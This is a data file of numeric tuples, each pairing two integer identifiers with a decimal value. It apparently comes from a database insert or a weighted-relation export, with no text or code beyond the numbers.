(193, 238577, 1.00331),
(193, 238578, 1.09669),
(193, 238579, 1.02669),
(193, 238580, 1.23669),
(193, 238581, 0.98),
(193, 238582, 1.02669),
(193, 238583, 0.93331),
(193, 238584, 1.05),
(193, 238585, 1.05),
(193, 238586, 1.23669),
(193, 238587, 1.14331),
(193, 238588, 0.98),
(193, 238589, 1.12),
(193, 238590, 0.95669),
(193, 238591, 1.09669),
(193, 238592, 0.46669),
(290, 238592, 0.93338),
(193, 238593, 1.00331),
(193, 238594, 1.09669),
(193, 238595, 0.42),
(193, 238596, 0.98),
(193, 238597, 1.05),
(193, 238598, 0.32669),
(193, 238599, 0.95669),
(193, 238600, 1.02669),
(193, 238601, 0.51331),
(193, 238602, 1.05),
(193, 238603, 1.14331),
(193, 238604, 0.95669),
(193, 238605, 1.02669),
(193, 238606, 0.46669),
(193, 238607, 1.00331),
(193, 238608, 1.14331),
(193, 239355, 0.91),
(193, 239356, 1.05),
(193, 239357, 0.98),
(193, 239358, 1.09669),
(193, 239359, 0.88669),
(193, 239360, 1.00331),
(193, 239361, 1.12),
(193, 239362, 1.00331),
(193, 239363, 1.02669),
(193, 239364, 1.26),
(193, 239365, 0.69993),
(193, 239366, 1.77338),
(193, 239367, 2.00662),
(193, 239368, 0.95669),
(193, 239369, 1.02669),
(193, 239370, 1.00331),
(193, 239371, 1.05),
(193, 239372, 0.98),
(193, 239373, 1.00331),
(193, 239374, 1.07331),
(193, 239375, 1.00331),
(193, 239376, 1.07331),
(193, 239377, 1.07331),
(304, 239378, 1.09669),
(193, 239378, 2.19338),
(193, 239379, 1.12),
(193, 239380, 1.09669),
(193, 239381, 1.02669),
(193, 239382, 1.16669),
(193, 239383, 1.05),
(193, 239384, 1.00331),
(268, 239384, 1.00331),
(272, 239384, 1.00331),
(280, 239384, 1.00331),
(193, 239385, 1.00331),
(193, 239386, 0.98),
(193, 239387, 2.24),
(193, 239388, 1.14331),
(193, 239389, 1.09669),
(193, 239390, 2.24),
(193, 239391, 1.00331),
(193, 239392, 1.07331),
(193, 239393, 3.92),
(193, 239394, 1.02669),
(193, 239395, 1.12),
(193, 239396, 1.09669),
(193, 239397, 1.21331),
(193, 239398, 0.93331),
(193, 239399, 1.12),
(193, 239400, 1.09669),
(193, 239401, 0.95669),
(193, 239402, 1.00331),
(193, 239403, 1.00331),
(275, 239403, 1.00331),
(193, 239404, 1.07331),
(275, 239404, 1.07331),
(193, 239405, 0.95669),
(193, 239406, 1.05),
(193, 239407, 1.02669),
(193, 239408, 1.09669),
(193, 239409, 1.05),
(193, 239410, 1.00331),
(193, 239411, 1.14331),
(193, 239412, 0.98),
(193, 239413, 1.05),
(193, 239414, 1.00331),
(193, 239415, 1.05),
(193, 239416, 0.98),
(193, 239417, 0.98),
(193, 239418, 0.98),
(193, 239419, 1.05),
(193, 239420, 1.05),
(306, 239421, 0.98),
(193, 239421, 2.94),
(270, 239421, 5.88),
(301, 239421, 5.88),
(193, 239422, 1.02669),
(193, 239423, 1.02669),
(193, 239424, 1.00331),
(193, 239425, 0.93331),
(273, 239425, 0.93331),
(193, 239426, 0.98),
(193, 239427, 1.16669),
(193, 239428, 0.91),
(193, 239429, 1.00331),
(193, 239430, 2.73),
(193, 239431, 1.00331),
(193, 239432, 1.96),
(193, 239433, 1.02669),
(193, 239434, 1.19),
(193, 239435, 0.91),
(193, 239436, 1.00331),
(193, 239437, 0.98),
(304, 239437, 0.98),
(193, 239438, 1.02669),
(193, 239439, 3.73324),
(193, 239440, 1.02669),
(193, 239441, 1.00331),
(193, 239442, 1.19),
(193, 239443, 1.00331),
(193, 239444, 0.91),
(193, 239445, 1.00331),
(193, 239446, 0.95669),
(193, 239447, 1.09669),
(193, 239448, 1.00331),
(193, 239449, 1.00331),
(193, 239450, 1.02669),
(193, 239451, 0.88669),
(193, 239452, 0.95669),
(193, 239453, 1.02669),
(193, 239454, 0.91),
(193, 239455, 1.12),
(193, 239456, 0.91),
(193, 239457, 1.05),
(193, 239458, 0.95669),
(193, 239459, 1.09669),
(193, 239460, 1.05),
(193, 239461, 0.93331),
(193, 239462, 1.00331),
(193, 239463, 0.46669),
(193, 239464, 1.14331),
(193, 239465, 1.23669),
(193, 239466, 1.02669),
(193, 239467, 1.09669),
(193, 239468, 1.07331),
(193, 239469, 1.26),
(193, 239470, 0.18669),
(193, 239471, 0.91),
(193, 239472, 1.02669),
(193, 239473, 0.23331),
(287, 239473, 0.23331),
(193, 239474, 1.05),
(193, 239475, 1.14331),
(193, 239476, 0.56),
(193, 239477, 0.93331),
(193, 239478, 1.05),
(193, 239479, 0.93331),
(193, 239480, 1.14331),
(193, 239481, 0.95669),
(193, 239482, 0.93331),
(193, 239483, 0.93331),
(193, 239484, 1.09669),
(193, 239485, 1.02669),
(193, 239486, 0.91),
(193, 239487, 0.98),
(193, 239488, 1.09669),
(193, 239489, 0.95669),
(193, 239490, 0.86331),
(193, 239491, 0.95669),
(193, 239492, 0.98),
(193, 239493, 0.86331),
(193, 239494, 1.05),
(193, 239495, 0.95669),
(193, 239496, 1.12),
(193, 239497, 1.00331),
(193, 239498, 0.93331),
(193, 239499, 1.05),
(193, 239500, 0.84),
(193, 239501, 0.95669),
(193, 239502, 3.19992),
(193, 239503, 0.98),
(193, 239504, 1.07331),
(193, 239505, 0.98),
(193, 239506, 2.14662),
(193, 239507, 1.02669),
(193, 239508, 1.00331),
(193, 239509, 0.88669),
(193, 239510, 0.98),
(193, 239511, 1.00331),
(193, 239512, 1.05),
(193, 239513, 1.05),
(193, 239514, 0.51331),
(193, 239515, 1.09669),
(193, 239516, 1.19),
(193, 239517, 0.42),
(193, 239518, 1.09669),
(193, 239519, 1.19),
(193, 239520, 0.23331),
(193, 239521, 0.91),
(193, 239522, 1.05),
(265, 240328, 0.86331),
(266, 240328, 0.86331),
(267, 240328, 0.86331),
(267, 240702, 1.07331),
(269, 240702, 1.07331),
(269, 249825, 1.77338),
(270, 249825, 2.66007),
(301, 249825, 2.66007),
(270, 250477, 1.02669),
(301, 250477, 1.02669),
(270, 250478, 0.93331),
(301, 250478, 0.93331),
(270, 250479, 1.00331),
(301, 250479, 1.00331),
(270, 250480, 0.93331),
(301, 250480, 0.93331),
(270, 250481, 1.02669),
(301, 250481, 1.02669),
(270, 250482, 0.98),
(301, 250482, 0.98),
(270, 250483, 1.07331),
(301, 250483, 1.07331),
(270, 250484, 0.42),
(301, 250484, 0.42),
(270, 250485, 1.02669),
(301, 250485, 1.02669),
(270, 250486, 1.14331),
(301, 250486, 1.14331),
(270, 250643, 0.42),
(301, 250643, 0.42),
(270, 250644, 1.00331),
(301, 250644, 1.00331),
(270, 250645, 1.14331),
(301, 250645, 1.14331),
(270, 250646, 1.00331),
(301, 250646, 1.00331),
(270, 250647, 0.95669),
(275, 250647, 0.95669),
(301, 250647, 0.95669),
(270, 250648, 1.14331),
(301, 250648, 1.14331),
(270, 250649, 0.95669),
(301, 250649, 0.95669),
(270, 250650, 0.91),
(301, 250650, 0.91),
(270, 250651, 1.00331),
(301, 250651, 1.00331),
(270, 250652, 1.00331),
(301, 250652, 1.00331),
(270, 250653, 1.09669),
(301, 250653, 1.09669),
(270, 250654, 0.98),
(301, 250654, 0.98),
(270, 250655, 0.98),
(301, 250655, 0.98),
(270, 250656, 0.95669),
(301, 250656, 0.95669),
(270, 250657, 1.07331),
(301, 250657, 1.07331),
(270, 250658, 1.09669),
(301, 250658, 1.09669),
(270, 250659, 1.02669),
(301, 250659, 1.02669),
(270, 250660, 1.02669),
(301, 250660, 1.02669),
(270, 250661, 1.02669),
(301, 250661, 1.02669),
(270, 250662, 1.00331),
(274, 250662, 1.00331),
(301, 250662, 1.00331),
(270, 250663, 0.98),
(301, 250663, 0.98),
(270, 250664, 0.98),
(301, 250664, 0.98),
(270, 250665, 1.05),
(301, 250665, 1.05),
(270, 250666, 0.98),
(301, 250666, 0.98),
(270, 250667, 1.07331),
(301, 250667, 1.07331),
(270, 250668, 0.93331),
(301, 250668, 0.93331),
(270, 250669, 1.02669),
(301, 250669, 1.02669),
(270, 250670, 1.09669),
(301, 250670, 1.09669),
(270, 250671, 1.16669),
(301, 250671, 1.16669),
(270, 250672, 1.05),
(301, 250672, 1.05),
(270, 250673, 1.00331),
(301, 250673, 1.00331),
(270, 250674, 1.19),
(301, 250674, 1.19),
(270, 250675, 0.95669),
(301, 250675, 0.95669),
(270, 250676, 1.02669),
(301, 250676, 1.02669),
(270, 250677, 0.91),
(301, 250677, 0.91),
(270, 250678, 1.07331),
(301, 250678, 1.07331),
(270, 250679, 1.00331),
(301, 250679, 1.00331),
(270, 250680, 0.95669),
(301, 250680, 0.95669),
(270, 250681, 1.07331),
(301, 250681, 1.07331),
(265, 250682, 0.88669),
(266, 250682, 0.88669),
(270, 250682, 0.88669),
(301, 250682, 0.88669),
(270, 250683, 1.00331),
(301, 250683, 1.00331),
(270, 250684, 0.93331),
(301, 250684, 0.93331),
(270, 250685, 3.92),
(301, 250685, 3.92),
(270, 250686, 1.05),
(301, 250686, 1.05),
(270, 250687, 0.32669),
(301, 250687, 0.32669),
(270, 250688, 0.95669),
(301, 250688, 0.95669),
(270, 250689, 1.07331),
(301, 250689, 1.07331),
(270, 250690, 0.23331),
(301, 250690, 0.23331),
(270, 250691, 0.88669),
(301, 250691, 0.88669),
(270, 250692, 1.05),
(301, 250692, 1.05),
(270, 250693, 0.91),
(301, 250693, 0.91),
(270, 250694, 0.95669),
(301, 250694, 0.95669),
(265, 250923, 0.81669),
(266, 250923, 0.81669),
(265, 250924, 1.05),
(266, 250924, 1.05),
(265, 250925, 0.98),
(266, 250925, 0.98),
(265, 250926, 1.05),
(266, 250926, 1.05),
(265, 251063, 1.02669),
(266, 251063, 1.02669),
(292, 251063, 1.02669),
(265, 251064, 1.12),
(266, 251064, 1.12),
(265, 251065, 0.95669),
(266, 251065, 0.95669),
(265, 251066, 0.88669),
(266, 251066, 0.88669),
(265, 251067, 1.00331),
(266, 251067, 1.00331),
(265, 251068, 1.00331),
(266, 251068, 1.00331),
(265, 251069, 0.91),
(266, 251069, 0.91),
(265, 251070, 0.98),
(266, 251070, 0.98),
(265, 251071, 0.91),
(266, 251071, 0.91),
(265, 251072, 1.09669),
(266, 251072, 1.09669),
(265, 251073, 1.09669),
(266, 251073, 1.09669),
(265, 251074, 1.28331),
(266, 251074, 1.28331),
(265, 251293, 1.05),
(266, 251293, 1.05),
(265, 251294, 1.96),
(266, 251294, 1.96),
(265, 251295, 0.98),
(266, 251295, 0.98),
(265, 251296, 0.91),
(266, 251296, 0.91),
(265, 251297, 1.00331),
(266, 251297, 1.00331),
(265, 251298, 0.95669),
(266, 251298, 0.95669),
(265, 251299, 1.05),
(266, 251299, 1.05),
(265, 251300, 1.00331),
(266, 251300, 1.00331),
(265, 251301, 1.12),
(266, 251301, 1.12),
(265, 251302, 0.98),
(266, 251302, 0.98),
(265, 251303, 1.00331),
(266, 251303, 1.00331),
(265, 251304, 1.05),
(266, 251304, 1.05),
(265, 251305, 1.07331),
(266, 251305, 1.07331),
(265, 251306, 1.14331),
(266, 251306, 1.14331),
(265, 251307, 0.98),
(266, 251307, 0.98),
(265, 251308, 0.98),
(266, 251308, 0.98),
(265, 251309, 0.98),
(266, 251309, 0.98),
(265, 251310, 1.21331),
(266, 251310, 1.21331),
(265, 251311, 0.95669),
(266, 251311, 0.95669),
(265, 251312, 1.02669),
(266, 251312, 1.02669),
(265, 251313, 0.91),
(266, 251313, 0.91),
(265, 251314, 1.00331),
(266, 251314, 1.00331),
(265, 251315, 0.98),
(266, 251315, 0.98),
(265, 251316, 1.09669),
(266, 251316, 1.09669),
(265, 251317, 0.91),
(266, 251317, 0.91),
(275, 251317, 0.91),
(265, 251318, 1.12),
(266, 251318, 1.12),
(265, 251319, 0.91),
(266, 251319, 0.91),
(265, 251320, 1.00331),
(266, 251320, 1.00331),
(265, 251321, 0.95669),
(266, 251321, 0.95669),
(265, 251322, 1.07331),
(266, 251322, 1.07331),
(265, 251323, 0.88669),
(266, 251323, 0.88669),
(265, 251324, 1.00331),
(266, 251324, 1.00331),
(265, 251325, 0.98),
(266, 251325, 0.98),
(265, 251326, 1.07331),
(266, 251326, 1.07331),
(265, 251327, 0.95669),
(266, 251327, 0.95669),
(265, 251328, 1.05),
(266, 251328, 1.05),
(265, 251329, 0.98),
(266, 251329, 0.98),
(265, 251330, 1.09669),
(266, 251330, 1.09669),
(265, 251331, 1.14331),
(266, 251331, 1.14331),
(265, 251332, 1.05),
(266, 251332, 1.05),
(265, 251333, 1.14331),
(266, 251333, 1.14331),
(265, 251334, 0.98),
(266, 251334, 0.98),
(265, 251335, 1.14331),
(266, 251335, 1.14331),
(265, 251336, 1.05),
(266, 251336, 1.05),
(265, 251337, 1.07331),
(266, 251337, 1.07331),
(265, 251338, 1.14331),
(266, 251338, 1.14331),
(265, 251339, 1.07331),
(266, 251339, 1.07331),
(265, 251340, 1.00331),
(266, 251340, 1.00331),
(265, 251341, 1.14331),
(266, 251341, 1.14331),
(265, 251342, 0.91),
(266, 251342, 0.91),
(265, 251343, 1.02669),
(266, 251343, 1.02669),
(265, 251344, 1.09669),
(266, 251344, 1.09669),
(265, 251345, 0.88669),
(266, 251345, 0.88669),
(304, 251345, 0.88669),
(265, 251346, 1.05),
(266, 251346, 1.05),
(265, 251347, 0.95669),
(266, 251347, 0.95669),
(265, 251348, 1.07331),
(266, 251348, 1.07331),
(265, 251349, 0.95669),
(266, 251349, 0.95669),
(265, 251350, 1.00331),
(266, 251350, 1.00331),
(265, 251351, 0.98),
(266, 251351, 0.98),
(265, 251352, 0.95669),
(266, 251352, 0.95669),
(265, 251353, 1.05),
(266, 251353, 1.05),
(265, 251354, 0.88669),
(266, 251354, 0.88669),
(265, 251355, 0.93331),
(266, 251355, 0.93331),
(265, 251356, 1.09669),
(266, 251356, 1.09669),
(265, 251357, 0.95669),
(266, 251357, 0.95669),
(265, 251358, 1.05),
(266, 251358, 1.05),
(265, 251359, 0.98),
(266, 251359, 0.98),
(265, 251360, 0.95669),
(266, 251360, 0.95669),
(272, 253230, 0.91),
(280, 253230, 0.91),
(272, 253231, 1.07331),
(280, 253231, 1.07331),
(272, 253232, 1.00331),
(280, 253232, 1.00331),
(272, 253233, 1.07331),
(280, 253233, 1.07331),
(272, 253234, 0.91),
(280, 253234, 0.91),
(272, 253235, 1.02669),
(280, 253235, 1.02669),
(272, 253236, 1.12),
(280, 253236, 10.24),
(272, 253237, 1.19),
(280, 253237, 1.19),
(272, 253238, 1.09669),
(280, 253238, 1.09669),
(272, 253239, 1.16669),
(280, 253239, 1.16669),
(272, 253240, 0.98),
(280, 253240, 0.98),
(272, 253241, 1.21331),
(280, 253241, 1.21331),
(272, 253242, 0.28),
(280, 253242, 0.28),
(272, 253243, 1.14331),
(280, 253243, 1.14331),
(272, 253244, 1.23669),
(280, 253244, 1.23669),
(272, 253245, 0.93331),
(280, 253245, 0.93331),
(272, 253246, 1.05),
(280, 253246, 1.05),
(272, 253247, 0.37338),
(280, 253247, 0.37338),
(272, 253248, 0.91),
(280, 253248, 0.91),
(272, 253249, 1.00331),
(280, 253249, 1.00331),
(272, 253250, 0.86331),
(280, 253250, 0.86331),
(272, 253251, 0.98),
(280, 253251, 0.98),
(272, 253252, 1.00331),
(280, 253252, 1.00331),
(272, 253253, 1.09669),
(280, 253253, 1.09669),
(272, 253254, 1.09669),
(280, 253254, 1.09669),
(272, 253255, 1.28331),
(280, 253255, 1.28331),
(272, 253256, 0.95669),
(280, 253256, 0.95669),
(272, 253257, 1.23669),
(280, 253257, 1.23669),
(272, 253258, 0.93331),
(280, 253258, 0.93331),
(272, 253259, 1.05),
(280, 253259, 1.05),
(272, 253561, 1.05),
(280, 253561, 1.05),
(272, 253562, 1.12),
(280, 253562, 1.12),
(272, 253563, 1.05),
(280, 253563, 1.05),
(272, 253564, 1.00331),
(280, 253564, 1.00331),
(272, 253565, 1.09669),
(280, 253565, 1.09669),
(272, 253566, 0.95669),
(280, 253566, 0.95669),
(272, 253567, 1.07331),
(280, 253567, 1.07331),
(272, 253568, 0.95669),
(280, 253568, 0.95669),
(272, 253569, 1.05),
(280, 253569, 1.05),
(272, 253570, 0.93331),
(280, 253570, 0.93331),
(272, 253571, 1.12),
(280, 253571, 1.12),
(272, 253572, 1.00331),
(280, 253572, 1.00331),
(272, 253573, 1.02669),
(280, 253573, 1.02669),
(272, 253574, 1.12),
(280, 253574, 1.12),
(272, 253575, 1.07331),
(280, 253575, 1.07331),
(272, 253576, 1.09669),
(280, 253576, 1.09669),
(272, 253577, 0.93331),
(280, 253577, 0.93331),
(272, 253578, 1.00331),
(280, 253578, 1.00331),
(272, 253579, 0.93331),
(280, 253579, 0.93331),
(272, 253580, 1.00331),
(280, 253580, 1.00331),
(272, 253581, 0.95669),
(280, 253581, 0.95669),
(275, 253581, 8.74688),
(272, 253582, 0.88669),
(280, 253582, 0.88669),
(272, 253583, 0.95669),
(280, 253583, 0.95669),
(272, 253584, 1.09669),
(280, 253584, 1.09669),
(272, 253585, 1.00331),
(280, 253585, 1.00331),
(272, 253586, 0.98),
(280, 253586, 0.98),
(272, 253587, 1.02669),
(280, 253587, 1.02669),
(272, 253588, 1.05),
(280, 253588, 1.05),
(272, 253589, 1.21331),
(280, 253589, 1.21331),
(272, 253590, 1.05),
(280, 253590, 1.05),
(272, 253591, 1.00331),
(280, 253591, 1.00331),
(272, 253592, 1.26),
(280, 253592, 1.26),
(272, 253593, 1.12),
(280, 253593, 1.12),
(272, 253594, 0.98),
(280, 253594, 0.98),
(272, 253595, 1.05),
(280, 253595, 1.05),
(272, 253596, 1.21331),
(280, 253596, 1.21331),
(272, 253597, 0.88669),
(280, 253597, 0.88669),
(306, 253597, 0.88669),
(272, 253598, 0.98),
(280, 253598, 0.98),
(272, 253599, 0.95669),
(280, 253599, 0.95669),
(272, 253600, 1.05),
(280, 253600, 1.05),
(272, 253601, 1.30669),
(280, 253601, 1.30669),
(272, 253602, 1.05),
(280, 253602, 1.05),
(272, 253603, 0.93331),
(280, 253603, 0.93331),
(272, 253604, 0.98),
(280, 253604, 0.98),
(272, 253605, 1.09669),
(280, 253605, 1.09669),
(272, 253606, 0.98),
(280, 253606, 0.98),
(272, 253607, 1.00331),
(280, 253607, 1.00331),
(272, 253608, 1.12),
(280, 253608, 1.12),
(272, 253609, 0.91),
(280, 253609, 0.91),
(306, 253609, 0.91),
(272, 253610, 0.88669),
(280, 253610, 0.88669),
(272, 253611, 1.00331),
(280, 253611, 1.00331),
(272, 253612, 0.91),
(280, 253612, 0.91),
(272, 253613, 1.00331),
(280, 253613, 1.00331),
(272, 253614, 0.98),
(280, 253614, 0.98),
(272, 253615, 1.02669),
(280, 253615, 1.02669),
(272, 253616, 0.86331),
(273, 253616, 0.86331),
(275, 253616, 0.86331),
(280, 253616, 0.86331),
(305, 253616, 0.86331),
(272, 253617, 1.16669),
(280, 253617, 1.16669),
(272, 253618, 1.14331),
(280, 253618, 1.14331),
(272, 253619, 0.88669),
(280, 253619, 0.88669),
(272, 253620, 0.98),
(280, 253620, 0.98),
(272, 253621, 1.12),
(280, 253621, 1.12),
(272, 253622, 0.95669),
(280, 253622, 0.95669),
(272, 253623, 1.02669),
(280, 253623, 1.02669),
(272, 253624, 0.91),
(280, 253624, 0.91),
(272, 253625, 0.93331),
(280, 253625, 0.93331),
(272, 253626, 1.07331),
(280, 253626, 1.07331),
(272, 253627, 0.95669),
(280, 253627, 0.95669),
(272, 253628, 1.09669),
(280, 253628, 1.09669),
(272, 253629, 1.21331),
(280, 253629, 1.21331),
(273, 256071, 0.77),
(273, 256072, 0.84),
(273, 256073, 0.77),
(273, 256074, 0.81669),
(273, 256075, 0.84),
(273, 256076, 1.05),
(273, 256077, 0.74),
(273, 256078, 2.4666),
(273, 256079, 2.7334),
(273, 256199, 0.91),
(273, 256200, 1.00331),
(273, 256201, 1.07331),
(273, 256202, 0.37331),
(273, 256203, 0.98),
(273, 256204, 1.09669),
(273, 256205, 0.93331),
(273, 256206, 1.02669),
(273, 256207, 0.98),
(273, 256208, 1.05),
(273, 256209, 1.00331),
(273, 256210, 1.07331),
(273, 256211, 2.00662),
(273, 256212, 1.07331),
(273, 256213, 1.14331),
(273, 256214, 1.21331),
(273, 256215, 1.02669),
(273, 256216, 1.33),
(273, 256480, 1.02669),
(273, 256481, 0.93331),
(273, 256482, 1.00331),
(273, 256483, 1.19),
(273, 256484, 1.02669),
(273, 256485, 1.05),
(273, 256486, 1.16669),
(273, 256487, 0.88669),
(273, 256488, 0.95669),
(273, 256489, 1.00331),
(273, 256490, 1.00331),
(273, 256491, 1.07331),
(273, 256492, 0.93331),
(273, 256493, 1.05),
(273, 256494, 0.91),
(273, 256495, 0.98),
(273, 256496, 0.91),
(273, 256497, 1.00331),
(273, 256498, 0.98),
(273, 256499, 1.12),
(273, 256500, 1.02669),
(273, 256501, 1.07331),
(273, 256502, 1.09669),
(273, 256503, 0.86331),
(273, 256504, 0.93331),
(273, 256505, 0.93331),
(273, 256506, 1.00331),
(273, 256507, 1.02669),
(274, 256508, 0.95669),
(273, 256508, 1.91338),
(273, 256509, 0.98),
(273, 256510, 1.09669),
(273, 256511, 1.16669),
(273, 256512, 1.16669),
(273, 256513, 1.30669),
(273, 256514, 1.14331),
(273, 256515, 1.14331),
(273, 256516, 1.26),
(273, 256517, 1.21331),
(273, 256518, 1.05),
(273, 256519, 1.07331),
(273, 256520, 0.93331),
(273, 256521, 0.98),
(273, 256522, 1.12),
(273, 256523, 1.19),
(273, 256524, 0.91),
(305, 256524, 0.91),
(273, 256525, 1.07331),
(273, 256526, 1.05),
(273, 256527, 1.02669),
(273, 256528, 0.93331),
(273, 256529, 0.84),
(273, 256530, 0.98),
(273, 256531, 0.91),
(273, 256532, 0.93331),
(273, 256533, 1.07331),
(273, 256534, 0.95669),
(273, 256535, 0.93331),
(273, 256536, 0.93331),
(273, 256537, 1.05),
(273, 256538, 5.06323),
(273, 256539, 0.93331),
(306, 256539, 0.93331),
(273, 256540, 1.00331),
(273, 256541, 0.28),
(273, 256542, 0.93331),
(273, 256543, 1.07331),
(273, 256544, 0.88669),
(306, 256544, 0.88669),
(273, 256545, 1.00331),
(273, 256546, 0.91),
(292, 256546, 0.91),
(273, 256547, 0.98),
(273, 256548, 0.86331),
(273, 256549, 0.95669),
(274, 260736, 0.91),
(275, 260736, 0.91),
(274, 260737, 1.00331),
(275, 260737, 1.00331),
(233, 266348, 0.95669),
(233, 266349, 1.16669),
(233, 266467, 0.81669),
(233, 266468, 1.07331),
(233, 266469, 3.00993),
(233, 266470, 1.16669),
(233, 266471, 2.14662),
(233, 266472, 0.23331),
(233, 266473, 1.07331),
(233, 266474, 1.14331),
(233, 266475, 1.05),
(233, 266653, 0.32669),
(233, 266654, 0.98),
(233, 266655, 1.09669),
(233, 266656, 0.91),
(233, 266657, 1.02669),
(233, 266658, 1.05),
(233, 266659, 1.07331),
(233, 266660, 1.00331),
(233, 266661, 1.07331),
(233, 266662, 0.98),
(233, 266663, 1.05),
(233, 266664, 1.07331),
(233, 266665, 1.02669),
(233, 266666, 1.02669),
(233, 266667, 1.05),
(233, 266668, 1.02669),
(233, 266669, 1.12),
(233, 266670, 0.98),
(233, 266671, 0.91),
(233, 266672, 1.00331),
(233, 266673, 1.07331),
(233, 266674, 0.93331),
(233, 266675, 1.14331),
(233, 266676, 0.95669),
(233, 266677, 0.98),
(233, 266678, 1.07331),
(233, 266679, 8.55),
(233, 266680, 0.95669),
(233, 266681, 1.02669),
(233, 266682, 1.09669),
(233, 266683, 1.00331),
(292, 266683, 1.00331),
(233, 266684, 1.12),
(233, 266685, 2.00662),
(233, 266686, 1.14331),
(233, 266687, 1.19),
(233, 266688, 0.95669),
(233, 266689, 1.05),
(233, 266690, 1.00331),
(233, 266691, 1.07331),
(235, 267364, 0.77),
(235, 267365, 0.86331),
(235, 267366, 0.93331),
(235, 267367, 0.81669),
(235, 267368, 1.02669),
(235, 267369, 0.35),
(235, 267370, 0.91),
(235, 267371, 0.98),
(235, 267374, 0.86331),
(235, 267375, 0.95669),
(235, 267376, 0.88669),
(235, 267377, 1.00331),
(235, 267575, 0.37331),
(235, 267576, 0.98),
(235, 267577, 1.12),
(235, 267578, 0.42),
(235, 267579, 1.00331),
(235, 267580, 1.21331),
(235, 267581, 0.95669),
(235, 267582, 1.09669),
(235, 267583, 1.00331),
(235, 267584, 1.14331),
(235, 267585, 1.07331),
(235, 267586, 1.05),
(235, 267587, 1.00331),
(235, 267588, 1.09669),
(235, 267589, 1.07331),
(288, 267589, 1.07331),
(235, 267590, 0.98),
(235, 267591, 1.07331),
(235, 267592, 0.28),
(235, 267593, 0.91),
(235, 267594, 1.05),
(235, 267595, 0.42),
(235, 267596, 1.00331),
(235, 267597, 1.07331),
(235, 267598, 0.93331),
(235, 267599, 1.02669),
(235, 268000, 0.98),
(235, 268001, 1.05),
(235, 268002, 1.05),
(235, 268003, 1.12),
(235, 268004, 0.98),
(235, 268005, 1.12),
(235, 268006, 0.93331),
(235, 268007, 1.05),
(235, 268008, 0.88669),
(235, 268009, 0.93331),
(235, 268010, 1.00331),
(235, 268011, 1.02669),
(299, 268012, 1.00331),
(235, 268012, 2.00662),
(235, 268013, 0.98),
(235, 268014, 0.88669),
(235, 268015, 1.00331),
(235, 268016, 1.02669),
(235, 268017, 1.14331),
(235, 268018, 1.02669),
(235, 268019, 1.12),
(235, 268020, 1.05),
(235, 268021, 1.16669),
(235, 268022, 2.00662),
(235, 268023, 1.00331),
(235, 268024, 1.07331),
(235, 268025, 1.86662),
(235, 268026, 1.05),
(235, 268027, 1.00331),
(235, 268028, 1.09669),
(292, 268028, 1.09669),
(235, 268029, 1.21331),
(235, 268030, 1.00331),
(235, 268031, 0.98),
(235, 268032, 1.07331),
(235, 268033, 1.02669),
(235, 268034, 7.22019),
(235, 268035, 7.79019),
(235, 268036, 1.05),
(235, 268037, 1.16669),
(235, 268038, 1.00331),
(235, 268039, 1.09669),
(235, 268040, 1.05),
(235, 268041, 0.88669),
(235, 268042, 0.95669),
(235, 268043, 1.14331),
(235, 268044, 2.14662),
(235, 268045, 2.28662),
(235, 268046, 1.02669),
(235, 268047, 0.95669),
(235, 268048, 1.02669),
(235, 268049, 0.93331),
(235, 268050, 1.02669),
(235, 268051, 0.91),
(235, 268052, 0.98),
(235, 268053, 1.00331),
(235, 268054, 1.12),
(235, 268055, 0.95669),
(235, 268056, 1.14331),
(235, 268057, 0.95669),
(235, 268058, 1.02669),
(235, 268059, 1.00331),
(235, 268060, 0.91),
(290, 268060, 0.91),
(235, 268061, 0.98),
(235, 268062, 0.95669),
(235, 268063, 1.02669),
(235, 268064, 1.14331),
(235, 268065, 1.05),
(235, 268066, 0.91),
(235, 268067, 0.98),
(235, 268068, 1.05),
(235, 268069, 1.12),
(235, 268070, 1.05),
(235, 268071, 1.12),
(235, 268072, 0.91),
(235, 268073, 0.98),
(235, 268074, 0.32669),
(235, 268075, 0.95669),
(235, 268076, 1.07331),
(235, 268077, 1.12),
(235, 268078, 1.26),
(235, 268079, 0.91),
(235, 268080, 1.09669),
(235, 268081, 0.95669),
(235, 268082, 0.86331),
(235, 268083, 0.98),
(235, 268084, 0.98),
(235, 268085, 1.05),
(235, 268086, 1.07331),
(235, 268087, 0.93331),
(235, 268088, 1.26),
(235, 268089, 0.93331),
(235, 268090, 0.98),
(235, 268091, 2.58993),
(235, 268092, 1.91338),
(235, 268093, 1.12),
(235, 268094, 0.91),
(235, 268095, 1.00331),
(235, 268096, 1.05),
(235, 268097, 1.12),
(235, 268098, 1.09669),
(235, 268099, 1.19),
(236, 268470, 0.81669),
(236, 268471, 1.12),
(236, 268472, 1.05),
(236, 268473, 0.86331),
(236, 268474, 0.93331),
(236, 268475, 0.91),
(236, 268476, 0.35),
(236, 268477, 1.00331),
(236, 268478, 1.12),
(236, 268479, 0.35),
(236, 268480, 0.93331),
(236, 268481, 1.00331),
(236, 268482, 0.86331),
(236, 268483, 0.95669),
(236, 268490, 0.95669),
(236, 268491, 0.86331),
(236, 268492, 0.91),
(236, 268493, 0.79331),
(236, 268494, 0.84),
(236, 268710, 0.23331),
(236, 268711, 0.88669),
(236, 268712, 1.05),
(236, 268713, 0.91),
(236, 268714, 0.98),
(236, 268715, 0.93331),
(236, 268716, 1.14331),
(236, 268717, 0.28),
(236, 268718, 0.93331),
(236, 268719, 1.09669),
(236, 268720, 0.91),
(236, 268721, 0.95669),
(236, 268722, 1.09669),
(236, 268723, 0.84),
(236, 268724, 0.93331),
(236, 268725, 0.81669),
(236, 268726, 0.86331),
(236, 268727, 0.23331),
(236, 268728, 0.95669),
(236, 268729, 1.00331),
(236, 268730, 1.07331),
(236, 268731, 1.26),
(236, 268732, 0.88669),
(236, 268733, 1.02669),
(236, 268734, 0.86331),
(236, 268735, 0.98),
(236, 268736, 0.91),
(236, 268737, 1.05),
(236, 268738, 1.16669),
(236, 268739, 0.95669),
(236, 268740, 1.05),
(236, 268741, 0.93331),
(292, 268741, 0.93331),
(236, 268742, 1.02669),
(292, 268742, 1.02669),
(236, 268743, 0.51331),
(236, 268744, 1.09669),
(236, 268745, 1.16669),
(236, 268746, 1.07331),
(236, 268747, 1.14331),
(236, 268748, 1.07331),
(236, 268749, 0.91),
(236, 268750, 1.00331),
(236, 269147, 0.91),
(236, 269148, 1.05),
(236, 269149, 0.88669),
(236, 269150, 1.07331),
(236, 269151, 1.02669),
(236, 269152, 0.98),
(236, 269153, 1.05),
(236, 269154, 1.05),
(236, 269155, 1.12),
(236, 269156, 0.95669),
(236, 269157, 1.09669),
(236, 269158, 1.02669),
(236, 269159, 1.00331),
(236, 269160, 1.05),
(236, 269161, 1.00331),
